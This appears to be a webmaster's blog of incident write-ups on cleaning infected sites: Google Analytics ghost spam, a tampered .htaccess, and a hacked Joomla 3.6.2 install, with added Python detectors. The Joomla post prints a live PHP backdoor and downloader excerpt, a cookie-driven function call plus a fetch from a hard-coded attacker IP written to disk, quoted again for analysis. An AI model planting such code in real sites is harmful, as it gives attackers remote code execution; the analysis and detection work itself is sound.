Remove wer5.exe With Adlice RogueKiller

We have a customer that is having this “wer5.exe” pop-up. I never saw the pop-up; however, I was able to get the program removed using Adlice’s RogueKiller.

I tried Vipre antivirus and it didn’t find anything on the machine.

I used Malwarebytes, which found 5 items.

RogueKiller found 12 items, and “wer5.exe” was one of them.

I hope this helps someone else out there…


Google Analytics Spam – Secret.ɢoogle.com You are invited! Enter only with this ticket URL. Copy it. Vote for Trump!

At first I thought I was going to get a bunch of photography business when I saw I got 149 visits in the past month to my photography website. I went to analyze the traffic and saw the following in the language section of my dashboard.

(screenshot: language_vote_trump)

I looked at GEO location, and saw this.

(screenshot: language_vote_trump_map)

Here are the channels for the month.

(screenshot: language_vote_trump_organic)

Interesting part was there were 0 queries for the month.

Weird, but I think definitely a Russian attack on my site leading to bad usage of my website.

I hope this entertained someone else out there…

Comment if you had the same thing happen to your site.
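Added example, not from the post: the referrer Secret.ɢoogle.com is not a Google domain at all. The “ɢ” is U+0262 LATIN LETTER SMALL CAPITAL G, not the ASCII letter g, so the name only reads like google.com. The Python below runs over constructed analytics rows modeled on the dashboard above and flags a row when the language field carries a sentence instead of a tag like en-us, when the source hostname contains non-ASCII characters, and when its lookalike-folded form matches a trusted domain. The lookalike table and the “last two labels” rule for the registrable domain are simplifying assumptions, not a full Unicode confusables or public-suffix implementation.

```python
import re
import unicodedata

# Small constructed lookalike table (an assumption, not Unicode's full
# confusables.txt): small-capital and Cyrillic letters that render like ASCII.
LOOKALIKES = {
    "\u0262": "g", "\u0274": "n", "\u0280": "r", "\u0299": "b",  # ɢ ɴ ʀ ʙ small capitals
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",  # Cyrillic а е о р
    "\u0441": "c", "\u0455": "s", "\u0456": "i", "\u0445": "x",  # Cyrillic с ѕ і х
}

# Real GA language values look like "en-us" or "de-de".
LANGUAGE_TAG = re.compile(r"^[a-z]{2,3}(?:-[a-z0-9]{2,8})*$", re.I)

# Constructed rows modeled on the dashboard in the post (149 sessions, the
# message stuffed into the language field); sessions counts are made up except that one.
SAMPLE_ROWS = [
    {"source": "google", "language": "en-us", "sessions": 12},
    {"source": "secret.ɢoogle.com",
     "language": "Secret.ɢoogle.com You are invited! Enter only with this ticket URL. "
                 "Copy it. Vote for Trump!",
     "sessions": 149},
    {"source": "bing", "language": "de-de", "sessions": 3},
]


def skeleton(host):
    """Fold a hostname to the ASCII string a human would read it as."""
    host = unicodedata.normalize("NFKC", host).strip().lower()
    return "".join(LOOKALIKES.get(ch, ch) for ch in host)


def registrable(host):
    # Assumption: the last two labels are enough for the .com cases here;
    # a real tool would consult the public suffix list.
    return ".".join(host.split(".")[-2:])


def classify_host(host, trusted=("google.com",)):
    """'genuine', 'lookalike' (reads like a trusted domain but is not) or 'other'."""
    raw = host.strip().lower()
    if registrable(raw) in trusted:
        return "genuine"
    if registrable(skeleton(raw)) in trusted:
        return "lookalike"
    return "other"


def language_is_spam(value):
    """Ghost spam puts a message where a language tag belongs."""
    value = value.strip()
    if value in ("", "(not set)"):      # legitimate GA placeholders
        return False
    return LANGUAGE_TAG.match(value) is None


def flag_ghost_spam(rows, trusted=("google.com",)):
    """Return the rows that look like analytics spam, each with its reasons."""
    flagged = []
    for row in rows:
        reasons = []
        if language_is_spam(row["language"]):
            reasons.append("language field carries a message")
        if classify_host(row["source"], trusted) == "lookalike":
            reasons.append(f"source {row['source']!r} mimics {registrable(skeleton(row['source']))}")
        if any(ord(ch) > 127 for ch in row["source"]):
            reasons.append("source hostname contains non-ASCII characters")
        if reasons:
            flagged.append({**row, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for row in flag_ghost_spam(SAMPLE_ROWS):
        print(row["source"], row["sessions"], "->", "; ".join(row["reasons"]))
```

The same three checks are what a view filter in Analytics would key on: the hostname, the language value and the fact that the characters are not plain ASCII.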


Google Getting Tough On Malware Or Web Masters

I came across this article about Google getting tough on malware. It starts out talking about Google putting out warning messages to users that a site has malware, forcing webmasters to clean it up.

Though this puts pressure on webmasters not to have a “set it and forget it” attitude about the website, the article goes on to say that Google isn’t out to punish third-party plugin developers and owners of legitimate sites. They are really targeting the serious offenders: bad sites pushing out malware.

http://www.newsfactor.com/story.xhtml?story_id=0320013QVEO0

I hope this helps someone else out there…


How To Fix Attacked .htaccess File On Godaddy Shared Hosting

Got a call from a client about a website not coming up. If you searched for the site in a search engine and clicked on any link to the site, you got a page about a missing PHP file. This site is a static HTML site.

I opened the .htaccess file and saw redirects to a PHP file that didn’t exist. I cleared out the .htaccess file, and when you clicked on the search link the site came up fine.

I contacted GoDaddy looking for help, but they don’t deal with .htaccess files. You are on your own. They do offer SiteLock to protect the site.

I used the advice at the following link: rename the .htaccess file and, in the contents of the file, rewrite the name back to all lower case.

https://perishablepress.com/improve-site-security-by-protecting-htaccess-files/

My final .htaccess file contained the following:

# Deny web access to any file with ".hta" in its name (.htaccess, .htaccess.bak, ...).
# Note this pattern does not cover .htpasswd. "order/deny/satisfy" is Apache 2.2
# syntax; on Apache 2.4 the equivalent is "Require all denied".
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny 
deny from all 
satisfy all 
</Files>

In addition, I changed the password for FTP access. The next step is to use Sucuri. I know they can protect this site.
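As an added example (not from the post or from the linked article), here is a small Python audit that checks an .htaccess file for the pattern described above: a rewrite that sends search-engine visitors to a PHP script that does not exist in the web root of a static site, and whether the .htaccess itself is protected from being read over the web. The infected sample is constructed from the symptom in the post; the file name redirect.php, the exact RewriteCond and the list of site files are assumptions, not the real contents of the client’s hosting account.

```python
import fnmatch
import re

# Constructed sample, modeled on the symptom in the post: visitors arriving
# from a search engine are rewritten to a PHP file that does not exist on a
# static HTML site. "redirect.php" and the RewriteCond are assumptions.
INFECTED_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\\. [NC]
RewriteRule ^.*$ /redirect.php [L]
DirectoryIndex index.html
"""

# The cleaned-up file from the post, kept as a control case.
CLEAN_HTACCESS = """\
<Files ~ "^.*\\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
DirectoryIndex index.html
"""

# Files that really exist in the static site's web root (constructed).
SITE_FILES = {"index.html", "about.html", "images/logo.png", ".htaccess"}

REDIRECTING = re.compile(
    r"^(RewriteRule|Redirect(?:Match|Permanent|Temp)?|ErrorDocument)\s+(.+)$", re.I)
REFERER_COND = re.compile(r"^RewriteCond\s+%\{HTTP_REFERER\}", re.I)
FILES_OPEN = re.compile(r'<(Files|FilesMatch)\s+(~\s*)?"?([^">]+?)"?\s*>', re.I)


def directives(text):
    """Yield non-comment lines with surrounding whitespace stripped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            yield line


def redirect_targets(text):
    """Yield (directive, destination) for each directive that sends the visitor elsewhere."""
    for line in directives(text):
        m = REDIRECTING.match(line)
        if not m:
            continue
        # drop trailing [flags]; the destination is the last remaining argument
        args = [a for a in m.group(2).split()
                if not (a.startswith("[") and a.endswith("]"))]
        if len(args) >= 2:
            yield m.group(1), args[-1]


def protects_htaccess(text):
    """True if some <Files>/<FilesMatch> pattern in the file matches ".htaccess"."""
    for line in directives(text):
        m = FILES_OPEN.match(line)
        if not m:
            continue
        tag, tilde, pattern = m.group(1).lower(), m.group(2), m.group(3)
        try:
            if tag == "filesmatch" or tilde:          # regex form
                hit = re.search(pattern, ".htaccess") is not None
            else:                                     # shell-wildcard form
                hit = fnmatch.fnmatch(".htaccess", pattern)
        except re.error:
            hit = False
        if hit:
            return True
    return False


def audit_htaccess(text, site_files):
    """Return human-readable findings for one .htaccess file of a static site."""
    findings = []
    for directive, target in redirect_targets(text):
        path = target.split("?", 1)[0]
        if not path.lower().endswith((".php", ".phtml")):
            continue
        if path.lstrip("/") in site_files:
            findings.append(f"{directive} sends visitors to {path}: a PHP script on a static site")
        else:
            findings.append(f"{directive} sends visitors to {path}, which does not exist in the web root")
    if any(REFERER_COND.match(line) for line in directives(text)):
        findings.append("RewriteCond on HTTP_REFERER: the rewrite fires only for visitors "
                        "arriving from other sites, so the owner typing the URL never sees it")
    if not protects_htaccess(text):
        findings.append("no <Files> block pattern covers .htaccess, so it may be readable over the web")
    return findings


if __name__ == "__main__":
    for name, text in (("infected", INFECTED_HTACCESS), ("clean", CLEAN_HTACCESS)):
        print(name, audit_htaccess(text, SITE_FILES) or ["no findings"])
```

The referrer condition is the part worth remembering: it is why the client’s site looked fine when you typed the address in but broke from a search result, and why checking a site only by visiting it directly can miss this kind of tampering.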

I hope this helps me and helps someone else out there…


Help Sucuri Clean Sites

Sucuri Antivirus is a great service. I found an attack on a Joomla 3.5 site where a PayPal form and a zip file were inserted into the images folder.

There were the following clues to the attack:

  • PHP & INI files in the images directory
  • New folders called “bt”, “BT”, and “mic” in the images directory.
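Added example, not code from Sucuri or from the post: a Python scan of a Joomla images/ folder that looks for the clues listed above (PHP and INI files, unexpected top-level folders, zip archives) plus one more check a practitioner would add, a file whose name says image but whose body starts with a PHP open tag. The sample tree is constructed in a temporary folder and its file names are made up; the list of expected Joomla sub-folders is an assumption taken from a default Joomla 3 install.

```python
import tempfile
from pathlib import Path

# Sub-folders a default Joomla 3 install ships under images/ (assumption;
# add the folders your template or editor creates).
KNOWN_DIRS = frozenset({"banners", "headers", "sampledata"})
EXECUTABLE_OR_CONFIG = {".php", ".phtml", ".php5", ".phar", ".ini"}
EXPECTED = {".jpg", ".jpeg", ".png", ".gif", ".svg", ".webp", ".ico", ".pdf", ".html"}


def looks_like_php(path):
    """True if the file body contains a PHP open tag, whatever its extension says."""
    with open(path, "rb") as fh:
        head = fh.read(4096)
    return b"<?php" in head or b"<?=" in head


def scan_images_dir(root, known_dirs=KNOWN_DIRS):
    """Return (reason, relative_path) pairs for everything that should not be in images/."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root).as_posix()
        if path.is_dir():
            if path.parent == root and path.name not in known_dirs:
                findings.append(("unexpected directory", rel))
            continue
        ext = path.suffix.lower()
        php = looks_like_php(path)
        if php and ext in EXPECTED:
            findings.append(("php code disguised as image", rel))
        elif php or ext in EXECUTABLE_OR_CONFIG or path.name.lower() == ".htaccess":
            findings.append(("executable or config file", rel))
        elif ext == ".zip":
            findings.append(("archive", rel))
        elif ext not in EXPECTED:
            findings.append(("unexpected file type", rel))
    return findings


def build_sample_tree():
    """Constructed sample modeled on the clues in the post: bt/BT/mic folders and
    PHP and INI files under images/. Every file name here is made up."""
    root = Path(tempfile.mkdtemp(prefix="joomla_images_"))
    (root / "banners").mkdir()
    (root / "banners" / "osmbanner1.png").write_bytes(b"\x89PNG\r\n\x1a\n")
    (root / "index.html").write_text("<!DOCTYPE html><title></title>\n")
    for name in ("bt", "BT", "mic"):
        (root / name).mkdir(exist_ok=True)  # bt and BT collide on case-insensitive disks
    (root / "bt" / "form.php").write_text("<?php echo 'fake checkout'; ?>\n")
    (root / "mic" / "php.ini").write_text("allow_url_fopen=On\n")
    (root / "mic" / "kit.zip").write_bytes(b"PK\x03\x04")
    (root / "logo.jpg").write_text("<?php /* a script wearing an image name */ ?>\n")
    return root


if __name__ == "__main__":
    for reason, rel in scan_images_dir(build_sample_tree()):
        print(f"{reason:28} {rel}")
```

Run it against the real images/ folder instead of the sample tree by passing that path to scan_images_dir(). A php.ini dropped in a writable folder deserves a look of its own: it lets an attacker change PHP settings for scripts in that folder on hosts that honour per-directory INI files.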

I contacted Sucuri to see if they wanted my findings, and they have an email address that accepts this kind of information: labs@sucuri.net

I hope this helps someone else out there…


Joomla Security Check Extension – trying this one out

Got an email from Joomshine about security. I have had a couple of Joomla sites get attacked, and I really don’t want to have to deal with the lack of faith that the site is attacker-proof.

I downloaded this plugin, “Securitycheck”, and I am going to take it for a test run. I will let you know how it goes. Here is the link.

https://extensions.joomla.org/extension/securitycheck

I hope this helps someone else out there…


Google Analytics – Joomla 3.6.2 – frequent queries

Looking at a customer’s analytics, I see the following a lot.

“please enter the email address for your account. a verification code will be sent to you. once you have received the verification code, you will be able to choose a new password for your account.”

This is the text shown when you need to recover your password.

This text is located in “language/en-GB/en-GB.com_users.ini”. I used Notepad++ to easily edit this text, hoping it will change the results.

I hope this helps someone else out there…


Hacked Joomla 3.6.2 site – cms brute rmf 3.0.zip file found in GoDaddy hosting.

Had a recent Joomla 3.6.2 install go blank. The site was fine one day and the next it was unreachable.

I FTP’ed into the site and saw WordPress folders in there and other strange files. There was a zip file called “cms brute rmf 3.0.zip”. There were odd PHP files such as “ebb6bff35a.php”. Looks like an attack for sure. The PHP file was extremely complex.

The file “ebb6bff35a.php” starts out with a one-line backdoor: if an “id” cookie is set, it calls whatever PHP function is named in the “user” cookie, passing the “id” cookie’s value as the argument, so the attacker can run any function just by setting two cookies. The rest of the excerpt fetches a file named by the “d” query parameter from the following IP and writes it to disk under that same name. This IP stems from Belize.

<?php
// Backdoor: the function named in the "user" cookie is called with the
// "id" cookie as its argument; the "@" hides any error it raises.
if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);

// Liveness check so the attacker can confirm the file is reachable.
if (isset($_REQUEST["test_url"])) {
    echo "file test okay";
}

// Downloader: fetch the file named by ?d=... from the attacker's server
// and save it under that same name next to this script.
$f = $_GET["d"];
$id = $f;
$current = file_get_contents("http://80.87.205.79/$f");
file_put_contents($id, $current);

// Start of a bundled copy of the PclZip library (a pure-PHP zip handler).
if (!defined('PCLZIP_READ_BLOCK_SIZE')) {
    define('PCLZIP_READ_BLOCK_SIZE', 2048);
}
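Added example, not part of the post: a small Python static checker that pulls the three indicators out of that excerpt, the dynamic call through $_COOKIE (backdoor), the fetch from a hard-coded URL (downloader) and the write to a request-controlled path. It follows request data through simple assignments so it can tell that the $id passed to file_put_contents() came from $_GET["d"]. SAMPLE_PHP is the page’s own excerpt re-typed with straight quotes; BENIGN_PHP is a constructed control file that reads request data but never executes or writes with it.

```python
import re

# The dropper excerpt quoted above, re-typed with straight quotes so the
# regexes see real PHP; this is the page's own snippet, not new malware.
SAMPLE_PHP = r'''<?php
if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);
if( isset($_REQUEST["test_url"]) ){ echo "file test okay"; }
$f =$_GET["d"];
$id=$f;
$current = file_get_contents("http://80.87.205.79/$f");
file_put_contents($id, $current);
if (!defined('PCLZIP_READ_BLOCK_SIZE')) { define( 'PCLZIP_READ_BLOCK_SIZE', 2048 ); }
'''

# Constructed control file: request data is read but only echoed, escaped.
BENIGN_PHP = r'''<?php
$q = $_GET["q"];
echo htmlspecialchars($q);
'''

SUPERGLOBAL = r"\$_(?:GET|POST|COOKIE|REQUEST|FILES)"
DYNAMIC_CALL = re.compile(SUPERGLOBAL + r"\[[^\]]*\]\s*\(")       # $_COOKIE["user"](...)
ASSIGNMENT = re.compile(r"\$(\w+)\s*=(?!=)\s*([^;]+);")             # $name = expr;
TAINT_SOURCE = re.compile(SUPERGLOBAL + r"\[")
VAR_REF = re.compile(r"\$(\w+)")
REMOTE_FETCH = re.compile(r"""file_get_contents\s*\(\s*["']https?://""")
REMOTE_HOST = re.compile(r"""["']https?://([^/"']+)""")
FILE_WRITE = re.compile(r"file_put_contents\s*\(\s*\$(\w+)")


def tainted_variables(src):
    """Variables holding request data, propagated through plain copies and
    expressions that mention a tainted variable ($id = $f; "...$f")."""
    tainted = set()
    changed = True
    while changed:                      # iterate to a fixpoint for chained copies
        changed = False
        for name, rhs in ASSIGNMENT.findall(src):
            if name in tainted:
                continue
            if TAINT_SOURCE.search(rhs) or any(v in tainted for v in VAR_REF.findall(rhs)):
                tainted.add(name)
                changed = True
    return tainted


def analyze_php(src):
    """Return indicators that a PHP file is a backdoor/dropper rather than site code."""
    tainted = tainted_variables(src)
    findings = []
    if DYNAMIC_CALL.search(src):
        findings.append("backdoor: calls a function whose name is taken from request data")
    if REMOTE_FETCH.search(src):
        findings.append("downloader: fetches content from a hard-coded remote URL")
    for var in FILE_WRITE.findall(src):
        if var in tainted:
            findings.append(f"arbitrary file write: file_put_contents() path ${var} is request-controlled")
    return {
        "findings": findings,
        "remote_hosts": sorted(set(REMOTE_HOST.findall(src))),   # IOCs to block or search logs for
        "tainted": sorted(tainted),
    }


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_PHP), ("benign", BENIGN_PHP)):
        print(label, analyze_php(src))
```

The remote host it extracts is the thing to search the hosting access logs for next: any request carrying a “d=” parameter to this file, or any outbound fetch to that address, dates the compromise.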

(screenshot: files_in_joomla_install)

Hopefully I can figure out what happened, but I am worried about security for sure.


After contacting GoDaddy it looks like a complete attack: PHP files were uploaded, directories were created, and I didn’t get to check the database. Had to do a GoDaddy account reset and restore from an Akeeba backup.

The restore from the backup didn’t go well; I got the following error.

(screenshot: akeeba_ajax_error)

I followed the instructions on this page.

https://www.akeebabackup.com/documentation/troubleshooter/kscantextract.html

I had to create the “kicktemp” folder and set its permissions to 777. Set the type of install to FTP. For the root directory I had to use “/”. Make sure to test the FTP connection.

The Kickstart restore took about 25 minutes to restore.

Here are the specs on the site.

  • Joomla 3.6.2
  • JCE
  • Akeeba
  • Chronoforms
  • JO Facebook Events Pro
  • Hot Themes Hot Fitness template.

One of the worst parts of this whole debacle is the SEO. The site was live for a month before the attack and the analytics were clicking along nicely. The site was getting around 300-plus hits in the first month with around 100 keyword matches.

During the attack the number of keyword matches jumped to 16,000, and the results were incredibly junky.

(screenshot: analytics)

This is a running store and has nothing to do with “sexy turkey”. This all happened in just a few days. I really hope this doesn’t offend Google and they decide to block the site.

I hope this helps someone else out there…


Follow up:

A month after this attack I looked at all of the directories and found no trace of another attack.

I am getting this in my Google Analytics reports.

please enter the email address for your account. a verification code will be sent to you. once you have received the verification code, you will be able to choose a new password for your account.

Does anyone know what to do about this?